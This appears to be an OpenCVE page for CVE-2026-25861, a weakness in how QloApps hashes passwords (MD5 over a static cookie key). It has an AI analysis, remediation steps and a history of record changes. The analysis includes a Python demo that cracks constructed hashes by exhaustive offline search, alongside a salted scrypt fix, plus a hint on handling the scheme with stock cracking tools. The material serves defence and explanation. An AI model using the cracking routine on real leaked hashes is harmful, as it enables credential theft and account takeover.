Description
QloApps through 1.7.0, fixed in commit 64e9722, contains a weak cryptographic algorithm vulnerability that allows attackers to compromise user credentials by exploiting the use of MD5 for password hashing in the Tools::encrypt() function within classes/Tools.php, which concatenates a static cookie key with the supplied password. Attackers can perform offline brute-force attacks against the MD5 hashes, with the risk compounded by auto-generated 8-character passwords assigned during guest-to-customer account conversion in classes/Customer.php, making credential recovery trivial.
Published: 2026-06-02
Score: 8.2 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability resides in the Tools::encrypt() function in classes/Tools.php of QloApps through version 1.7.0 (fixed in commit 64e9722). The function hashes the supplied password with MD5 after prepending a static cookie key. That key is the same for every account, so it acts as a site-wide pepper rather than a per-user salt, and MD5 itself adds no work factor; the resulting hashes are susceptible to offline brute-force attacks, and identical passwords produce identical hashes across accounts. Because guest-to-customer account conversion in classes/Customer.php assigns an automatically generated 8-character password, recovering those credentials is trivial once the hashes and the key are in an attacker's hands. The weakness is classified as CWE-916 (Use of Password Hash With Insufficient Computational Effort), and the compromise can lead to unauthorized account access.

Affected Systems

This weakness affects QloApps through version 1.7.0 (inclusive); the fix is in commit 64e9722. No other products or versions were explicitly identified as vulnerable in the provided data.

Risk and Exploitability

The CVSS v4.0 score of 8.2 marks the issue as high severity; the CVSS v3.1 vector scores it 5.9, and both vectors rate attack complexity as high, consistent with the attacker first needing to obtain the stored hashes and the installation's static cookie key through some other means. EPSS is below 1%, and the vulnerability is not listed in CISA's KEV catalog. Once an attacker holds the MD5 hashes from the database together with the cookie key, the brute-force attack runs entirely offline, without interacting with the live system, so login rate limiting and account lockout offer no protection. Because the key is shared by every account and auto-generated passwords are only 8 characters long, the required effort is minimal, making credential recovery and account takeover likely.
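The offline attack described above, as an added example that is not QloApps code: the legacy scheme is rebuilt from the advisory text (MD5 over a static cookie key followed by the password), and COOKIE_KEY, the account names, the passwords and the hashes-per-second figures are all constructed or assumed for the demo. The "hardened" side uses scrypt from the Python standard library as a stand-in for the PHP-side password_hash() fix, which the page does not show; the property it demonstrates (per-user salt plus a work factor) is the same.

```python
"""Offline guessing against md5(static_key + password), and what a per-user
salt plus a slow KDF changes.  Added example, not QloApps code: the legacy
scheme is rebuilt from the advisory text (MD5 over a static cookie key
followed by the password).  COOKIE_KEY, the account names, passwords and
the hashes-per-second figures are constructed/assumed; scrypt from the
stdlib stands in for the PHP-side password_hash() fix, which is not shown
on the page."""
import hashlib
import itertools
import os
from typing import Optional, Tuple

# Assumed stand-in for the installation's static cookie key (constructed).
COOKIE_KEY = "Rk9tWxYz2bqL8NcD7pHa"

# Work factor for the hardened side (16 MiB of memory per guess).
SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1, dklen=32)


def legacy_hash(cookie_key: str, password: str) -> str:
    """Reconstruction of the described Tools::encrypt(): one fast MD5 over
    key || password.  No per-user salt, no work factor."""
    return hashlib.md5((cookie_key + password).encode()).hexdigest()


def shared_password_groups(table: dict) -> dict:
    """Group accounts by stored hash.  With one static key and no salt,
    equal hashes mean equal passwords, which leaks before a single guess."""
    groups = {}
    for account, digest in table.items():
        groups.setdefault(digest, []).append(account)
    return {d: accounts for d, accounts in groups.items() if len(accounts) > 1}


def crack_legacy(cookie_key: str, targets: set, alphabet: str, length: int) -> dict:
    """Exhaustive offline search.  Each candidate costs one MD5 and is
    checked against every leaked hash at once, because the key is shared
    and there is no salt: the whole table is attacked in a single pass.
    Returns {hash: password} for every target recovered."""
    found = {}
    for chars in itertools.product(alphabet, repeat=length):
        candidate = "".join(chars)
        digest = legacy_hash(cookie_key, candidate)
        if digest in targets:
            found[digest] = candidate
            if len(found) == len(targets):
                break
    return found


def keyspace_hours(alphabet_size: int, length: int, hashes_per_second: float) -> float:
    """Worst-case wall-clock for exhausting the keyspace at an assumed rate."""
    return alphabet_size ** length / hashes_per_second / 3600


def hardened_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Per-user random salt plus a memory-hard KDF.  Equal passwords no
    longer yield equal records, and each guess costs milliseconds of CPU
    and 16 MiB of memory instead of one MD5 compression."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)


def hardened_verify(password: str, salt: bytes, digest: bytes) -> bool:
    return hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS) == digest


def demo() -> None:
    # Constructed leak of three guest-converted accounts; two happen to share
    # a password.  A 4-char lowercase space keeps the run under a second;
    # the real 8-char space differs only in size, not in cost per guess.
    alphabet, length = "abcdefghijklmnopqrstuvwxyz", 4
    table = {
        "alice@example.test": legacy_hash(COOKIE_KEY, "qloa"),
        "bob@example.test": legacy_hash(COOKIE_KEY, "qloa"),
        "carol@example.test": legacy_hash(COOKIE_KEY, "wzpm"),
    }
    print("shared passwords before cracking:", shared_password_groups(table))
    found = crack_legacy(COOKIE_KEY, set(table.values()), alphabet, length)
    for account, digest in table.items():
        print(f"{account}: {found.get(digest)}")
    # 62 alphanumerics ^ 8 chars at assumed rates: a GPU doing 1e10 MD5/s
    # versus a CPU doing 1e4 scrypt/s with the parameters above.
    print(f"md5 keyspace:    {keyspace_hours(62, 8, 1e10):.1f} hours")
    print(f"scrypt keyspace: {keyspace_hours(62, 8, 1e4):.1e} hours")
    salt, digest = hardened_hash("qloa")
    print("hardened verify:", hardened_verify("qloa", salt, digest),
          "| distinct records for equal passwords:", hardened_hash("qloa")[1] != digest)


if __name__ == "__main__":
    demo()
```

Two practitioner notes. First, in cracking-tool terms the legacy scheme is ordinary salted MD5 of the form md5($salt.$pass) with one salt shared by every hash, so a stock tool handles it with no custom mode. Second, existing MD5 records cannot be converted to the new format without the plaintext: a migration has to rehash on the next successful login and, for guest-converted accounts whose 8-character passwords may already have been recovered, force a reset rather than wait for a login.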

Generated by OpenCVE AI on June 3, 2026 at 03:55 UTC.

Remediation

No separate vendor advisory or workaround is listed on this page; the CVE description identifies the fix as commit 64e9722 (full hash 64e9722e7e6a8fda77dd53964d988fb6b5c3d174).

OpenCVE Recommended Actions

  • Update QloApps to the latest version or apply the patch commit 64e9722e7e6a8fda77dd53964d988fb6b5c3d174.
  • Enforce strong password policies, requiring longer, more complex passwords for all accounts.
  • Disable or replace the auto‑generation of 8‑character passwords during guest‑to‑customer account conversion.


Advisories

No advisories yet.

History

Wed, 03 Jun 2026 16:30:00 +0000

Type | Values Removed | Values Added
Metrics | (none) | ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 03 Jun 2026 12:45:00 +0000

Type | Values Removed | Values Added
First Time appeared | (none) | Qloapps; Qloapps qloapps
Vendors & Products | (none) | Qloapps; Qloapps qloapps

Wed, 03 Jun 2026 02:30:00 +0000

Type | Values Removed | Values Added
Description | (none) | QloApps through 1.7.0, fixed in commit 64e9722, contains a weak cryptographic algorithm vulnerability that allows attackers to compromise user credentials by exploiting the use of MD5 for password hashing in the Tools::encrypt() function within classes/Tools.php, which concatenates a static cookie key with the supplied password. Attackers can perform offline brute-force attacks against the MD5 hashes, with the risk compounded by auto-generated 8-character passwords assigned during guest-to-customer account conversion in classes/Customer.php, making credential recovery trivial.
Title | (none) | QloApps 1.7.0 Weak Password Hashing via MD5 in Tools.php
Weaknesses | (none) | CWE-916
References | (none) | (none recorded)
Metrics | (none) | cvssV3_1 {'score': 5.9, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}; cvssV4_0 {'score': 8.2, 'vector': 'CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-06-03T14:12:34.812Z

Reserved: 2026-02-06T19:12:03.463Z

Link: CVE-2026-25861

Vulnrichment

Updated: 2026-06-03T14:12:14.377Z

NVD

Status : Received

Published: 2026-06-02T23:16:35.423

Modified: 2026-06-02T23:16:35.423

Link: CVE-2026-25861

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-03T10:54:27Z

Weaknesses